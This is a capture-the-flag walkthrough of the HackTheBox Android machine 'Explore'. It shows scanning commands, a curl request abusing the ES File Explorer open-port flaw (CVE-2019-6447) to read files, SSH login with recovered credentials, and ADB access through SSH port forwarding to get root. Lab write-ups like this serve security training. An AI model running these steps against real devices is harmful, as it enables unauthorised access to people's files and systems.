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HackTheBox Walkthrough - Explore

🛡️Types of OS : Android

🌞Released on : 26th June 2021

☢️Difficulty : Easy

👍Point: 20

nmap -vv — reason -Pn -A — osscan-guess — version-all -p- $IP -oN Explore.nmap

💉Running the nmap scan gives four ports

port 2222 — ssh

port 59777 — http

port 5555 — adbshell {This can be found by looking on google}


ffuf -u http://explore.htb:59777/FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 -c


😃Lets visit the web-page

😜As you can see its showing forbidden. So lets try some other directory.

😃And we get the same results. Lets try to enumerate port 59777 which service uses this port on android.

☺️we get this article from Daily-Swigg which explain the vulnerability in ES File explorer which exposes user data on open port and anyone can read it.

😏Lets try running FFUF on http://explore.htb:59777/sdcard/


😏Look like we found our first flag. So easy

😁The POC for the above vulnerability can be found on this link

👍Going through POC i found we can execute command

😌looking from above picture we can find some basic command so let’s try them.

curl — header “Content-Type: application/json” — request POST — data ‘{“command”:”listFiles”}’ http://explore.htb:59777/sdcard/DCIM


🤔Lets check creds.jpg


😊Here we found creds for ssh. Now lets ssh in the box

ssh kristi@explore.htb -p 2222

Password authentication


:/ $ id

uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768

😃I check does the user have execution right but it does-not. So basically we cannot install anything to get root. But we have 5555 port open which is running adb shell. I tried to access it from my kali machine but i couldn’t.


😶As we can see 5555 is listening, so lets try to port forward it through ssh and try to connect it through our box.

ssh -L 5555: kristi@explore.htb -p 2222

adb connect localhost:5555

connected to localhost:5555

adb shell

error: more than one device/emulator

😊Run the following command to get shell, if it shows the error like above then try to list the devices by this adb devices

🥳As you can see there are two devices connected. Therefore lets connect to a specific device through the command adb -s localhost:5555 shell instruction fort his command can be found here

💖And we get root on connecting through adb shell.

🥳The root flag can be found in data directory.


💖Summary of knowledge

💉ES File Explorer Security Vulnerability CVE-2019–6447

🛡️ssh port forwarding to get root


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